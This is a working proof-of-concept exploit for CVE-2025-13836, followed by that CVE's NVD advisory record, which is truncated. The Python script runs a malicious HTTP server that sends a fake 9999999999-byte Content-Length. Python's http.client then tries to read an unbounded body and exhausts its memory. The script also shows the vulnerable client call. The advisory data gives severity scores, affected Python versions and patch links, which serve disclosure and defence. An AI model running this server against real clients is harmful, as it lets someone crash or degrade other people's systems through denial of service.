CVE-2025-13836

""" CVE-2025-13836 PoC - Malicious HTTP Server This script simulates a malicious server that exploits the Content-Length vulnerability in Python's HTTP client to cause memory exhaustion on the client side. """ import socket import threading import time def handle_client(client_socket): """Handle incoming client connection with malicious Content-Length""" try: # Read HTTP request (we don't really need to process it) request = client_socket.recv(4096) # Send malicious HTTP response with huge Content-Length # The actual body is minimal, but Content-Length claims huge size malicious_response = ( "HTTP/1.1 200 OK\r\n" "Content-Type: text/plain\r\n" "Content-Length: 9999999999\r\n" # Huge fake size "\r\n" "Small payload - rest is never sent\n" ) client_socket.send(malicious_response.encode()) time.sleep(30) # Keep connection alive except Exception as e: print(f"Error: {e}") finally: client_socket.close() def start_malicious_server(port=8888): """Start the malicious HTTP server""" server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind(('0.0.0.0', port)) server.listen(5) print(f"Malicious server listening on port {port}") while True: client, addr = server.accept() print(f"Connection from: {addr}") client_handler = threading.Thread(target=handle_client, args=(client,)) client_handler.start() # Client-side exploit demonstration def exploit_client(target_host, target_port=8888): """ Vulnerable client code - DO NOT USE IN PRODUCTION This demonstrates how Python HTTP client can be exploited """ import http.client connection = http.client.HTTPConnection(target_host, target_port) connection.request("GET", "/") response = connection.getresponse() # This is the vulnerable part - read() without size limit # Will attempt to allocate massive buffer based on Content-Length try: data = response.read() # Vulnerable: no size limit print(f"Read {len(data)} bytes") except MemoryError: print("Memory exhaustion triggered!") if __name__ == "__main__": print("=== CVE-2025-13836 PoC ===") print("Start server: python cve-2025-13836_poc.py") start_malicious_server()

{"cve": {"id": "CVE-2025-13836", "sourceIdentifier": "[email protected]", "published": "2025-12-01T18:16:04.200", "lastModified": "2026-05-18T16:58:51.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When reading an HTTP response from a server, if no read amount is specified, the default behavior will be to use Content-Length. This allows a malicious server to cause the client to read large amounts of data into memory, potentially causing OOM or other DoS."}, {"lang": "es", "value": "Al leer una respuesta HTTP de un servidor, si no se especifica una cantidad de lectura, el comportamiento predeterminado será usar Content-Length. Esto permite a un servidor malicioso hacer que el cliente lea grandes cantidades de datos en la memoria, lo que podría causar OOM u otro DoS."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.10.20", "matchCriteriaId": "1F853468-5391-4279-B369-E480A2B91D6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.11.0", "versionEndExcluding": "3.11.15", "matchCriteriaId": "7B38F8DA-DD8F-4887-AC85-CE843E21AD74"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.12.0", "versionEndExcluding": "3.12.13", "matchCriteriaId": "963DB620-5766-4093-A80B-03F7975F712B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.13.0", "versionEndExcluding": "3.13.11", "matchCriteriaId": "7FE4D2F0-2F91-4444-87E4-F9231694D429"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.14.0:-:*:*:*:*:*:*", "matchCriteriaId": "D9A884CF-F98D-490D-A3B6-74F0DBFC3BD3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "A3327507-0B1D-4F28-A983-D07A2C8A7696"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha2:*:*:*:*:*:*", "matchCriteriaId": "C8AF17F1-A27F-4C98-BA5A-B4319710E8D1"}]}]}], "references": [{"url": "https://github.com/python/cpython/commit/14b1fdb0a94b96f86fc7b86671ea9582b8676628", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/python/cpython/commit/289f29b0fe38baf2d7cb5854f4bb573cc34a6a15", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/python/cpython/commit/4ce27904b597c77d74dd93f2c912676021a99155", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/python/cpython/commit/5a4c4a033a4a54481be6870aa1896fad732555b5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/python/cpython/commit/5dc101675fd22918facbbe0fecdc821502beaaf0", "source": "[email protected]", "tags": ... (truncated)